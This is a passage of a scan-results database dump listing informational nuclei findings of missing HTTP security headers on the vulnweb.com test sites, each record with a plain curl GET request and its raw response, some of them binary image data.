Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4345\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:20 GMT\r\nEtag: "4dca64a1-10f9"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001d\u0001\u0001\u0005\u0001\u0001\u0001\u0004\u0003\u0005\u0006\u0007\b\t\u0002\u0001��:\u0010\u0002\u0001\u0003\u0003\u0002\u0005\u0001\u0006\u0004\u0004\u0007\u0001\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061\u0007\u0013"AQa\u00142q���\u0015#B�\bR��\u0016$br������\u001b\u0001\u0001\u0005\u0001\u0001\u0001\u0002\u0003\u0004\u0006\u0005\u0007��0\u0011\u0002\u0002\u0001\u0003\u0003\u0001\u0006\u0005\u0005\u0001\u0001\u0002\u0003\u0011\u0004!1\u0005\u0012A"\u0006\u0013\u0014aq�2����BQ������\f\u0003\u0001\u0002\u0011\u0003\u0011?�JR��~���'�\rz5���[��PU�pT\u0012\t�$�a߷֛)�\u001f��T��ĩUn ��y!�7�Xث��\n�pA\u0007�~C\u001b�*�\u0012���*���O`)�\u0014�[n?\u000bm���_��Fv���@Hls���X���:�u\u000f��ݣ�e.��"�G�#<7��#\u0004�0Mh�)�q.\t\u001dR^\t�\u0015�\u0017�]iڽ��-�\u0013,',���\u0018��<�;��gu\u001e�\u000e����P\t�e�7*��'����M��\fVR�LH������\f\u001c�ˑ�\u0007\u0015�i]=\u0012�+.X\u00101���9\u0003۵f��I����\u0005��Ma\u001cg��M�^�kp1$M��\u0010\u000f�\u0019��\u0011�"�WV�/OEu%�\u0017\u0010�,�ݸ>p0�l��\u0003 �\\v��=K�E�ot���[iZ3�\n�\u0001����\u001f��E���;rS��[-ԥ*�\b�)@\nR��)@\nR�DŽ�\u001a����x��\u0012��६�C ~1�\u001c烐p1ۜT:�Ezx;,xHt ���/��[T��Oan��\u0014�6]FH ��~\u000e����Ji��\u0014��j;���OW�\u001f�\u001f53��4��n$��9\u0012eo0�`�b�9\u0001�#,��\u0004��Y����.\u0012g�[{�\\1\f������������azj����->���Ma��\u0011�ꚽ��\u0018f�G�q\u0012&�&3��Q�0T��������E�[^�Is�tp�[1\f{�\r��~\u0004�z�5�G\u0012eG�:�@8'�\u001e@� \u0001��H�\\6����8�� �\u001c�ƌz��;��1�y��\u0013\\�=���\n*\\~ÝUJO(�ZD!\u0002$��e�\u000eCn\u001fF\u001c\u001fʯ�t�w�K\u001cc\u0002u-\u001b�68�\u0019?\\sߜ�qY���$���뱉b\n���>~�Z��8S�Q���s�U;z����̙(��[�X]DV\u001b�W}�\u0002\\\t\u001c\u001e���\b�Y��h�F��\n4��a��8�l�\u001e;�\u0013�*�5��^-��3�\u0001 pO������k\u0003\u0018�n#B\u0019J�<�\u001e��]F��/�'zQ��d�0\\}�y\u001b|ou4H\u0013��Y�g#��3\\��$�\u0017�����A"G�Z��1�y�&7���3��}��.���NH��0�\r�g\t�L\u0012���X\u000f�\u001e\u001f���ؠ��\u001e�\f�u��p��\f��\u0014�\\��\u0007\u0007\u0018=N��#��E��/)���7�{\f.N �JԬ��o�,�#1����J��������*-zj�tr�*�A"���a\u0013�"�\u000e\u000b\t������@\nR��)@\nݽ\u0019�\u000e��tJi7�;\u000f�\b\u001d\u0004W6Q�^bn\u001b��r�\u0001݇\fG�q��*U}N��TT-YI�t&��\u0013�n���7�tKy�n-�%x\u0004�\bϨ\f.C\u0002ʳ\u0005$pH8�\b[��"]�-���,�r-\\\u0004i��#.Oel\u0010\u001b�;O#\u0019�O\n�@��}n9�.�\u000f i�\u0007��o�\u0003�\nϺ��[�g�4�m<�:��Y��+mf���n�\u0015�M��Fw��\u0007z�_�ŰԿq�1��\u001f,y-���[��}2�\u0005 x�Q<Bkq'\u000f�\u0003r���I\u0003\u001f\u0004|\u001a�%�b΀�\u0007'��.��g�����ݕ����\u0015i!�+�1�\u0001\u000e�%�\u0018����F+=�b��1ナ�YMt݋��ș�\u0019Dt��\u0014\\�\u000e_fcRC}x�\u000fDZ�>�\rݵմ�kr�\u0016��ψ��^0Ɂ�\\\u0013�\u00169<�\u0001W8�Y�z\u0015<�;Np�����U\u0003�\u0004\u000eǸ��Дc?W\u0001��"�\\%�@��'\u0001��ʺ�����=�\u001a�P��7��\u001f� �K;��\u001c��\u0006\t\\z�\u0017�\u0005��0��rx\u0018\u0019�n)�M��_�G"5�I%��\t\u0002V�����qT��/,\u000e�\u0019]C�\u0003��\n��\u0003R���a\u0001\u0016�\u0014h�E��1\u0004�p\u000f\u001f8��QU\\��\u0016^E�74w��\u0010�p�sG�b�\u0015\u0001fE?˺���l\u0003\u001e;\u0006��.\u0003ᯄ6�\u00163[u��MQ�%b��hT*�0R;�'��\\`溺�$��<�(0�\u0018�|`��U�P��]ķ�!�B�>0T�a\t��\u0019\u001e�\u0011�gAG]�Q��f���RǏ��"�\u001c��5~��t��M�6��$p��I��+�m�\f\u0002{�x��9\u000bZ�.�mR�O�����r���<\u0010\u000e\b�}\rz;\fP�\u001cN�dP7F㜃��pG��\\��'|5�L\u000f�Z4\u0011��)k����I�#.J�z\u0007$�=9�8\u0002�~�u��t^��\u001f_�3Q\u00055���\\�)[€�)@\nR��)@\u001d5�7�K'H�\u001a���}.O9\u001eFr\u0004\u001d�*�\u000b(�\r��v\u001c1<o��EK[����1R$i\u000b\u0015�c@����\r���\u001c�\n��@�nt]R\u001b�6ı��̧�S��Eu����%��q̗��л\u001c\u0003�$�\u0019��)��\f�\rb���**WU���Ogz�f�Ԅ����\u001d��-< *��d1��\u0014c<\u001f�q����j���Im$��:\u000f0\u0014V_Ab\u0007��\u0004\u0015*W$����Z����;M\u0006�SYLRYrʌ]��\u0014\u000e\u0007��\u00198�\t�lU�ÿ\u0013���d�\u0013ej���e���\u001f��\u0018e*�6{z\u0018}�\u000e\u001d\u001d3U\n%j_-��G�4�2����������1��bIc�f\u0001ܣ%\u001aA�'�RN\u0014\n�b>ߤ���>Z2�g\b��r��r\n�#���-N���\t�l�2�BF\u000f�\u0011�E}i��'��ܬ2yh��lM����@?�\u000f\u001d��)O�\u0012�"4��\u0017\u000b4A�ӆ(�N@e$0\u0007\u0003 \u0010Goj4�b��W\u0002\t1�g<q��?\u000b�1���N\u0013��X���8\u000e��1\u001a�\u0007�rs��J�4{�{eNy��l���N�'\r��ڟ%��9?�\\H��樑d\u000e�y�vc\u0018�l\u001eC\f��c?��u\u0017�:�\u0018\u0015 ���9\u0007����E��h�f��N�? g�##>٩v�)q\n�\u0013\u0006\f��\u001d�����9+������5�أ%��}�\u0018x݁uw<r2�y�\u0019�܏bI0z�N�R���h�{gc�G*���F\u0018!�\u000er;\f��o�!�X���v��\u0003\u0003;� d�H'\u0007��y\u0014Yb����/\u001f���\u0016����Bj:O^����ks~��e��\u000b��\f7#�\u0001�Or\u0006\u0001\f=��ֽ\u0019��eݬ\u001a�������Ȍ\u001d\u001cP\f?�O\u0004w\u0007�A=ܶV�k�$� ���Ci+\u0016$$�\u0017�9>�\u0019\u001c\f2ջ�.���Γ�ѵ+cotS̷�\u001b\\E0�\n�3�0r\u0001*���6�j��\\m��\u001e�����^zd����Vs�x[��e��uu�I�m8o�t�\u0018���\t�̀\u001eX\f.\u0018\u001c\u0015l`ղ���Y�I�\n�.<�R� ���+$鞮�zz�h�Xs�E��S\u00122G>�c��t��\u0011�ĖP���&˩�M\u0014��w<�����,\t�>�P)�j7:N�\r唅'��\u0003�~��j\u0015)ZMa��:��z�\u0014�i.\r�0��b�6�.~�\u0012I��Ͼs���������[�V\r���˒�\u0016%s�<���5����\\�G�7NH��w���<Ռ>F@,�w\u0003�s�9"�����=jd&W��ԏ1�m��ڟ@��ܱ��\u0005�4��l�Q�K)�|c�:TNV�&f):��\f9��\u0003������\u000f|��H��Kx�9�Ya�\f�T��.J��]�%�w�|�&0�w\u0003�\u000foҲ�\u000eܢ�c�a�\\SP��\u0011$2��7\u001b��|~+\u001b��[[����0$�ô\u0010s�~y�g�����-/��_4D�ޑ���9��@\u001f#��S5m@\\�\u001e�0ϸ�2��($��}���N\u001a\u0019S-�c��62�5�V�t���VR�\u0019�~�F\b �`�Ի=v���V2<�\u0002�bA��1' �3ܑ�yƓ��R�U�\u001d��\u0018�E��9ܟ�\u0003۱����T=T�ƭ��RyU7�*��\tu\u0005�G\u0003qQ���ƬˢO�e��\u0010���Q�:��5�s�F�l�\b#�\u000fЃ����ZMom��s2��}���`\u001229�\b�����#��{v�\u001c��V�\u0018u#��@��\\��_X��RА;\\+�Y�}\u0003��\u001c��+��*N���)���?an�W\u0013lx��/��\u0017���t�wD4N��I�\u001d���\u001d�@? v���r9��������ו���7%�9��5N�=?�ס��~Ne��\u001eX�)Wȅ)JR��\u0005)J��^ɧjVװ�2[Ȳ�e\f\t\u00078 �\b�\u0011��۾��P�M�Fb�H��\u000b�\\+/\u0003�\u000e\t�\u0013���j�tް�,��k\u0015t{kv-\u0018 �\\�\u0006�\u0012H�&���\u0004un2���znu��}#]\u000f:��=9a�~ď�\u001a��j�V���ʪ\u00103��\u0006I\u001e��{r\u0007\u0015�4\u001dXKio{lΚh��)%\u001e�\u0018��\u001d�\u001c\u0015��c���\u001da\u0016�u\u0004s�C\u0018\u000b$C'w�\u0004��n\r��������\u0014]��G,�u7_ZOc\u0006�\u0010H�l����� s��\u001fp\u0006@'�����K4\u0010�{\u0015IJ@]�\u0016m\ny�8\u0018���\u001a�ɼ�.n��3J�\u0015��I��Q���#�Ը�り�Y�z�\u000b���}F�\u0012\u001a7��ubC����x8��8�Z.���v�����[\u001fO�I\f��F�� �#�\u0013�V�U�\b��cn\b���rX��e��|�=��A�(PB��m\\\u001eG\n���'V��\rA�Mf���w�!*�����[�QU����\u0016\u0007J�K�JR�\u0018)JP\u0002��)JP\u0002��)JP\u0006ᖳq��]?%�\ry����� �\b�;f����f��ۉ�\n�Y��4���X�Q�N�$��iJ�\u0018�s��Hߤ�Ҕ�$b��)JP\u0002����", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 934, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 112, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'", + "type": "http", + "http_url": "http://www.vulnweb.com", + "discovered_date": "2024-11-13T02:42:29.768Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: www.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 935, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 1, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'", + "type": "http", + "http_url": "http://vulnweb.com", + "discovered_date": "2024-11-13T02:42:30.006Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 936, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/4.jpg.tn", + "discovered_date": "2024-11-13T02:42:30.281Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/4.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4615\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:58 GMT\r\nEtag: "4dca64a1-1207"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0002\u0003\u0001\u0001\u0001\u0001\u0004\u0005\u0003\u0006\u0002\u0001\u0007\b��5\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0005\u0002\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0004\u0012!\u00051A\u0013Q\u0006"aq�\u0014�#2B��R��%3���b��\u001a\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0002\u0005\u0004\u0006��0\u0011\u0002\u0002\u0001\u0003\u0001\u0006\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0012!1A\u0004\u0013"2Qq\u0005a���3��\u0014#Rb����\f\u0003\u0001\u0002\u0011\u0003\u0011?K4�5���\u001d�Ô\u0012I�?�#Y6��^�s`\u001f��# 2�#Ag��&V\u0016\u000f���:����'���02t��>\u001cnX3P�W��s��D�-���#�&8�3���q�\u0011�A�4\t�����0+���F�!�4�"��#�)c�\u0002�\u001b�zTZ��Wo\u0015�<s\r��\u00159D��&�\tRտ��\u000b�kZ$�������Z��>�{�rB�2�]�U]�wy \u001f\u001d���\u0010~�\r\u0006�K��ۊ�k�~����8\u000f��~fI\t\u001b�\u0015D\u001e���\u001d<�+\u0014(�v\u0002�j\u0003�?(Xi�|��RZ\u001e�C��o�.\u001e)w ! 3n\u000b�\u0013E���agU˔#BX�\u0002����=M���\u001a�}�\u0006�\u0002�=��\u001c��ca̭I���!�\u0003�N�Y�\u0019�0UdK��\b'��U����m��^>�Q��\u0012*��Q�\u000f\u001ac\u001c�\u0005�F���*�\\�4����ՆP\u0007<~t��U\u0014�2�<�gz��\u000f$Y���e�\u0006�?3\u0003�\n<v���X\u000e`U,p&�7�C\u0017�cW\u0006hP3/��[=�?�f\u001aL���"��ʑ��r�,�\u0015�*�\b.�"�$�\u0016{�\u0018="l����v��l�<�U#��I�r�x��ֶ�/�A�\u0015�C� BĒhj�-�g����\u0007�Г4���CL�\u0018\b��(�h�\u000by\u001c�B�\u0017�f&<pƱ�\u001a�(��(\u0001�5\\*\u0005\n�q�:��\u001bE\u0016&\\�����Q�\u0013�utg��}����\u0003��\u0019?��\t\u0014��@�\u001e,�����鼓n]/���U܄���Z\u0007��:[�ԃdK\u0004��e'bHl���s]������:\u000e�\u001c�ގ�9�?��U\u0010�)���:�\u0003+P\u0004��aF�X�<\u001b≩��0A��\u0003��X]O!�\u001a\u0003���A�H����6���{\u001f�T6�Ǭgvl�\u001e�[���X\u001c����\u0007=���o�M��/}f����W�\bn��8���\u0016"I�/A\u001b\u0005�������<��uy"R�ŀ���������\n\u001cԺ�t���,孨\u0011�P�A�\r��\u001a+3;ч��F;T{��[�����\u0016�V�6�uL��e��\nۈ,YX���?��N:.*b@����Q5}�������\u0007Ցi��}�������\n;��ד�h��/�Ӂ���9hw\u001f[���\\\\92_w��\u0010��\u0018�\u000b��\u001f�'��w3��8\u0001Yop\u0006ڂ�l�+C���:��r�t`zLV�A�|\u001f�\u0003��\u0002;\u0017�D�mm���\f̾���@�B7)��2�H��Ǜ�\\\u0011VF�};�'��L*@ۈV4O�ߑu��p1��ُ\u0018E�hw>��?]<��\u001fM\u0010�L�f�Sa\fƌ\n}t|_���15F����\u000e�\u0015\u000fSD\u001d^�\\��\t(\u001cX�j�:�:�\f�\u0018�y\u0007]�\u001fm#��`��S#*\b�@f\u000e�\u0015_sΪ\u001dy^L��\t�1Ŵ���k�7|7\u0015|}E���#3�#29�r8`{Q�΢\u000f�!�F$e۸�\u0018Ճ��<w\u0014k��uFN\u0013㱓\r�Ѱ��\u001d��·l�U&�r=��GϿ���ͦ�4�:�9�C���O��\u0015Z\u0012|�\\�$�\u0016b\u0015bI \n\u001c���^uT��f!��!�V��Uoɮkށ5�\u001e�\t�W�3(,�~`�F������k,���o4��r80����3��7Uλ���\u0015\u0001��;�\u001et�ى�����\b>ڂ^E����M�����@\u001as�=ŘC�\u0001�(�p�˘ϐ���)��"�<�0�z�7ȡ����yI\u0004b��{��8c��s=%A�&h�u�-�\u0001���3��f�\u0011���k�#��\b\u001d�滊҈D��z��+���O��cP\u0007a�x\u001fm<3Y��g�%\u001b�������"a,�|���k\u001e\u0001�kM�\u0015h\u000eݴ�\u0019UG}^z�\u0011r�(\u001e�k���\u0014N&f���4p����`<��.\u000f�Rf\u000b\u001cr��LE��\u0004w�a�\u0013;�d�$X�\u0018�o�($���A\u001e���\\���t��[��q'P�\u0014/,����I�\u001a\u001e_�q��#74I`E-{�?��F�\u0011|?��\u001eJL\u0015\f��.@!d\u0003�\u0006���oO��me��t��1���8 